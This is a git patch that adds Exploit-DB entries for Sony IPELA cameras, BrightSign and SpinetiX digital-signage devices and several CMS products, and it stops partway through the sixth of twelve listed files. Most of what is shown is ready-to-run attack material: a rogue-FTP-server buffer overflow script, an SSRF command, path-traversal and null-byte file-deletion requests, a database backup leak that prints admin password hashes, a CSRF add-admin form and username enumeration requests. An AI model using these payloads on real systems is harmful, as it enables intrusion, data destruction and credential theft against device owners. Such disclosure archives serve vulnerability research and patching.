From f697a81a18f3eddacbdb3a2192f66bd28b2e739d Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 2 Oct 2020 05:02:08 +0000 Subject: [PATCH] DB: 2020-10-02 12 changes to exploits/shellcodes Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow BrightSign Digital Signage Diagnostic Web Server 8.2.26 - Server-Side Request Forgery (Unauthenticated) BrightSign Digital Signage Diagnostic Web Server 8.2.26 - File Delete Path Traversal SpinetiX Fusion Digital Signage 3.4.8 - Database Backup Disclosure SpinetiX Fusion Digital Signage 3.4.8 - Cross-Site Request Forgery (Add Admin) SpinetiX Fusion Digital Signage 3.4.8 - Username Enumeration MonoCMS Blog 1.0 - Arbitrary File Deletion (Authenticated) WebsiteBaker 2.12.2 - 'display_name' SQL Injection (authenticated) GetSimple CMS 3.3.16 - Persistent Cross-Site Scripting (Authenticated) CMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authenticated) Typesetter CMS 5.1 - 'Site Title' Persistent Cross-Site Scripting Exhibitor Web UI 1.7.1 - Remote Code Execution --- exploits/hardware/remote/48842.py | 91 +++++++++++++++++++++++++++++ exploits/hardware/webapps/48843.txt | 49 ++++++++++++++++ exploits/hardware/webapps/48844.txt | 83 ++++++++++++++++++++++++++ exploits/hardware/webapps/48845.txt | 73 +++++++++++++++++++++++ exploits/hardware/webapps/48846.txt | 57 ++++++++++++++++++ exploits/hardware/webapps/48847.txt | 60 +++++++++++++++++++ exploits/java/webapps/48654.txt | 86 +++++++++++++++++++++++++++ exploits/php/webapps/48848.txt | 53 +++++++++++++++++ exploits/php/webapps/48849.txt | 46 +++++++++++++++ exploits/php/webapps/48850.txt | 57 ++++++++++++++++++ exploits/php/webapps/48851.txt | 31 ++++++++++ exploits/php/webapps/48852.txt | 43 ++++++++++++++ files_exploits.csv | 12 ++++ 13 files changed, 741 insertions(+) create mode 100755 exploits/hardware/remote/48842.py create mode 100644 exploits/hardware/webapps/48843.txt create mode 100644 exploits/hardware/webapps/48844.txt create mode 100644 exploits/hardware/webapps/48845.txt create mode 100644 exploits/hardware/webapps/48846.txt create mode 100644 exploits/hardware/webapps/48847.txt create mode 100644 exploits/java/webapps/48654.txt create mode 100644 exploits/php/webapps/48848.txt create mode 100644 exploits/php/webapps/48849.txt create mode 100644 exploits/php/webapps/48850.txt create mode 100644 exploits/php/webapps/48851.txt create mode 100644 exploits/php/webapps/48852.txt diff --git a/exploits/hardware/remote/48842.py b/exploits/hardware/remote/48842.py new file mode 100755 index 000000000..b73ad7657 --- /dev/null +++ b/exploits/hardware/remote/48842.py @@ -0,0 +1,91 @@ +# Exploit Title: Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow +# Google Dork: Server: Mida eFramework +# Date: 2020-09-30 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://pro.sony +# Version: <= 1.82.01 + +#!/usr/bin/env python +# +# +# Sony IPELA Network Camera (ftpclient.cgi) Remote Stack Buffer Overflow +# +# +# Vendor: Sony Electronics Inc. +# Product web page: https://pro.sony +# Affected version: SNC-DH120T v1.82.01 +# +# +# Summary: IPELA is Sony's vision of the ultimate workplace, designed to revolutionize +# the way business communicates over global IP networks. IPELA products can improve the +# efficiency of your organization by connecting people and places with high-quality audio +# and video. The SNC-DH120T is an indoor tamper proof, high definition (720p) minidome +# network security camera with Electronic Day/Night settings, DEPA analysis and is ONVIF +# compliant. It supports dual streaming of H.264, MPEG-4 and JPEG at full frame-rate. +# +# Desc: The vulnerability is caused due to a boundary error in the processing of received +# FTP traffic through the FTP client functionality (ftpclient.cgi), which can be exploited +# to cause a stack-based buffer overflow when a user issues a POST request to connect to a +# malicious FTP server. Successful exploitation could allow execution of arbitrary code on +# the affected device or cause denial of service scenario. +# +# Tested on: gen5th/1.x +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2020-5596 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5596.php +# Fixed in 1.88.0.0: https://pro.sony/en_NL/support-resources/snc-dh120/software/mpengb00000928 +# +# +# 28.10.2019 +# + + +# PoC: + +# Trigger: +# curl 'http://10.0.0.3:5080/command/ftpclient.cgi' \ +# -H 'Connection: keep-alive' \ +# -H 'Cache-Control: max-age=0' \ +# -H 'Authorization: Basic YWRtaW46YWRtaW4=' \ +# -H 'Upgrade-Insecure-Requests: 1' \ +# -H 'Origin: http://10.0.0.3:5080' \ +# -H 'Content-Type: application/x-www-form-urlencoded' \ +# -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36' \ +# -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \ +# -H 'Referer: http://81.83.17.200:5080/en/l4/ftp/common.html' \ +# -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \ +# --data 'FtpClientFunc=on&FcServerName=10.0.0.5&FcUserName=EVIL&FcPassword=NONESO&FcPassive=off&reload=referer' \ +# --compressed \ +# --insecure +# +# + +# Observed fixed version log: +# 2020-07-27 17:48:03 FTP client Unexpected error occurred during FTP client operation. +# + + +import socket + +HOST = '127.0.0.1' # 10.0.0.5 +PORT = 21 + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.bind((HOST, PORT)) +s.listen(1) +conn, addr = s.accept() +print 'Connection from', addr +while True: + data = conn.recv(1024) + if not data: + break + evil = "A" * 100000 + evil += "B" * 10000 + evil += "C" * 1000 + conn.sendall(evil+'\n') + s.close() \ No newline at end of file diff --git a/exploits/hardware/webapps/48843.txt b/exploits/hardware/webapps/48843.txt new file mode 100644 index 000000000..cd802da0d --- /dev/null +++ b/exploits/hardware/webapps/48843.txt @@ -0,0 +1,49 @@ +# Exploit Title: BrightSign Digital Signage Diagnostic Web Server 8.2.26 - Server-Side Request Forgery (Unauthenticated) +# Date: 2020-09-30 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.brightsign.biz +# Version: <= 8.2.26 + +BrightSign Digital Signage Diagnostic Web Server 8.2.26 Unauthenticated SSRF + + +Vendor: BrightSign, LLC +Product web page: https://www.brightsign.biz +Affected version: Model: XT, XD, HD, LS + Firmware / OS version: <=8.2.26 + + +Summary: BrightSign designs media players and provides free software +and cloud networking solutions for the commercial digital signage market +worldwide, serving all vertical segments of the marketplace. + +Desc: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability +exists in the BrightSign digital signage media player affecting the +Diagnostic Web Server (DWS). The application parses user supplied data +in the 'url' GET parameter to construct a diagnostics request to the +Download Speed Test service. Since no validation is carried out on the +parameter, an attacker can specify an external domain and force the +application to make an HTTP request to an arbitrary destination host. +This can be used by an external attacker for example to bypass firewalls +and initiate a service and network enumeration on the internal network +through the affected application. + +Tested on: roNodeJS + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5595 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5595.php + + +01.08.2020 + +-- + + +PoC: + +# curl http://10.0.0.17/speedtest?url=127.0.0.1:22 \ No newline at end of file diff --git a/exploits/hardware/webapps/48844.txt b/exploits/hardware/webapps/48844.txt new file mode 100644 index 000000000..0111d1656 --- /dev/null +++ b/exploits/hardware/webapps/48844.txt @@ -0,0 +1,83 @@ +# Exploit Title: SpinetiX Fusion Digital Signage 3.4.8 - File Delete Path Traversal +# Date: 2020-09-30 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.spinetix.com +# Version: <= 8.2.26 + +SpinetiX Fusion Digital Signage 3.4.8 File Backup/Delete Path Traversal + + +Vendor: SpinetiX AG +Product web page: https://www.spinetix.com +Affected version: <= 3.4.8 (1.0.36274) + +Summary: At SpinetiX we inspire businesses to unlock the potential of their story. +We believe in the power of digital signage as a dynamic new storytelling platform +to engage with people. For more than 13 years, we have been constantly innovating +to deliver cutting-edge digital signage solutions that help our customers shine. +Fusion is a built-in content management application accessible from a standard web +browser - it is pre-installed on every HMP200, HMP130, and HMP100 device, and does +not require any additional license, cost, or software installation. + +Desc: The application suffers from an authenticated path traversal vulnerability. +Input passed via several parameters in index.php script is not properly verified +before being used to create and delete files. This can be exploited to write backup +files to an arbitrary location and/or delete arbitrary files via traversal attacks. + +Tested on: Apache 2.2.34 + PHP/5.3.18-2 + Linux 2.6.10 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5594 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5594.php + + +03.08.2020 + +-- + + +File Backup Path Traversal: +--------------------------- + +POST /fusion/index.php?r=backup/create HTTP/1.1 +Host: 192.168.1.1 +Content-Length: 62 +Accept: */* +X-Requested-With: XMLHttpRequest +User-Agent: Mooshoo/1.2 +Content-Type: application/x-www-form-urlencoded +Origin: http://192.168.1.1 +Referer: http://192.168.1.1/fusion/index.php?r=settings/settings +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: fusionsess=vb5se309b2seig780p47ch0pn1 +Connection: close + +SystemBackup%5Bname%5D=..%2Ftest&SystemBackup%5Bbackupall%5D=0 + + +File Delete (test.7z) Path Traversal: +------------------------------------- + +GET /fusion/index.php?r=backup/delete&id=backup%3A../test&_=1600981467420 HTTP/1.1 +Host: 192.168.1.1 + + +Arbitrary File Delete Null Terminated String Extension Bypass Path Traversal: +----------------------------------------------------------------------------- + +GET /fusion/index.php?r=backup/delete&id=backup%3A../scripts/layouttheme.js%00&_=1600981467420 HTTP/1.1 +Host: 192.168.1.1 + + +Arbitrary Image Delete: +----------------------- + +GET /fusion/index.php?r=files/delete&id=image%3A../dirtysecret.svg&_=1601128841154 HTTP/1.1 +Host: 192.168.1.1 \ No newline at end of file diff --git a/exploits/hardware/webapps/48845.txt b/exploits/hardware/webapps/48845.txt new file mode 100644 index 000000000..f5e9416d2 --- /dev/null +++ b/exploits/hardware/webapps/48845.txt @@ -0,0 +1,73 @@ +# Exploit Title: SpinetiX Fusion Digital Signage 3.4.8 - Database Backup Disclosure +# Date: 2020-09-30 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.spinetix.com +# Version: <= 8.2.26 + +SpinetiX Fusion Digital Signage 3.4.8 Database Backup Disclosure + + +Vendor: SpinetiX AG +Product web page: https://www.spinetix.com +Affected version: <= 3.4.8 (1.0.36274) + +Summary: At SpinetiX we inspire businesses to unlock the potential of their story. +We believe in the power of digital signage as a dynamic new storytelling platform +to engage with people. For more than 13 years, we have been constantly innovating +to deliver cutting-edge digital signage solutions that help our customers shine. +Fusion is a built-in content management application accessible from a standard web +browser - it is pre-installed on every HMP200, HMP130, and HMP100 device, and does +not require any additional license, cost, or software installation. + +Desc: The application is vulnerable to unauthenticated database download and information +disclosure vulnerability. This can enable an attacker to disclose sensitive information +resulting in authentication bypass, session hijacking and full system control. + +Tested on: Apache 2.2.34 + PHP/5.3.18-2 + Linux 2.6.10 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5593 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5593.php + + +03.08.2020 + +-- + + +Request: +-------- + +GET /content/files/backups/ HTTP/1.0 +Host: 192.168.1.1 + +Response: +--------- + +HTTP/1.1 200 OK +Date: Wed, 26 Aug 2020 15:57:40 GMT +Server: Apache/2.2.22 (Unix) +X-spinetix-firmware: 3.0.6-1.0.21932 +X-raperca-version: 3.0.6-1.0.21912 +X-spinetix-serial: 001d400027b8 +X-spinetix-hw: BonsaiT +Content-Length: 636 +Connection: close +Content-Type: text/html;charset=UTF-8 + + +Index of /content/files/backups +Name Last modified Size Description +Parent Directory - +Custom1337Name.7z 25-Aug-2020 10:06 1.0M + +Extracting the .7z shows userpwd.txt file, cat userpwd.txt: + +admin:e10adc3949ba59abbe56e057f20f883e:file,program,activate,layout,playlist,model,slide,edit,admin::0 +testingus:b874da212a62786181c66c5bbaabf425:file,program,activate,layout,playlist,model,slide,edit,admin:se:1 \ No newline at end of file diff --git a/exploits/hardware/webapps/48846.txt b/exploits/hardware/webapps/48846.txt new file mode 100644 index 000000000..c8bc6737c --- /dev/null +++ b/exploits/hardware/webapps/48846.txt @@ -0,0 +1,57 @@ +# Exploit Title: SpinetiX Fusion Digital Signage 3.4.8 - Cross-Site Request Forgery (Add Admin) +# Date: 2020-09-30 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.spinetix.com +# Version: <= 8.2.26 + +SpinetiX Fusion Digital Signage 3.4.8 CSRF Add Admin Exploit + + +Vendor: SpinetiX AG +Product web page: https://www.spinetix.com +Affected version: <= 3.4.8 (1.0.36274) + +Summary: At SpinetiX we inspire businesses to unlock the potential of their story. +We believe in the power of digital signage as a dynamic new storytelling platform +to engage with people. For more than 13 years, we have been constantly innovating +to deliver cutting-edge digital signage solutions that help our customers shine. +Fusion is a built-in content management application accessible from a standard web +browser - it is pre-installed on every HMP200, HMP130, and HMP100 device, and does +not require any additional license, cost, or software installation. + +Desc: The application interface allows users to perform certain actions via HTTP +requests without performing any validity checks to verify the requests. This can +be exploited to perform certain actions with administrative privileges if a logged-in +user visits a malicious web site. + +Tested on: Apache 2.2.34 + PHP/5.3.18-2 + Linux 2.6.10 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5592 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5592.php + + +03.08.2020 + +-- + + + + + +
+ + + + + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/48847.txt b/exploits/hardware/webapps/48847.txt new file mode 100644 index 000000000..32580193c --- /dev/null +++ b/exploits/hardware/webapps/48847.txt @@ -0,0 +1,60 @@ +# Exploit Title: SpinetiX Fusion Digital Signage 3.4.8 - Username Enumeration +# Date: 2020-09-30 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.spinetix.com +# Version: <= 8.2.26 + +SpinetiX Fusion Digital Signage 3.4.8 Username Enumeration Weakness + + +Vendor: SpinetiX AG +Product web page: https://www.spinetix.com +Affected version: <= 3.4.8 (1.0.36274) + +Summary: At SpinetiX we inspire businesses to unlock the potential of their story. +We believe in the power of digital signage as a dynamic new storytelling platform +to engage with people. For more than 13 years, we have been constantly innovating +to deliver cutting-edge digital signage solutions that help our customers shine. +Fusion is a built-in content management application accessible from a standard web +browser - it is pre-installed on every HMP200, HMP130, and HMP100 device, and does +not require any additional license, cost, or software installation. + +Desc: The weakness is caused due to the login script and how it verifies provided +credentials. Attacker can use this weakness to enumerate valid users on the affected +node. + +Tested on: Apache 2.2.34 + PHP/5.3.18-2 + Linux 2.6.10 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5591 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5591.php + + +03.08.2020 + +-- + + +POST /fusion/index.php?r=users/login HTTP/1.1 +Host: 192.168.1.1 + +User[username]=NonExisting&User[password]=blah&User[rememberMe]=0&yt0.x=0&yt0.y=0 + +Response: Username is incorrect. +HTML:
Username is incorrect.
+ +--- + +POST /fusion/index.php?r=users/login HTTP/1.1 +Host: 192.168.1.1 + +User[username]=admin&User[password]=blah&User[rememberMe]=0&yt0.x=0&yt0.y=0 + +Response: Password is incorrect. +HTML: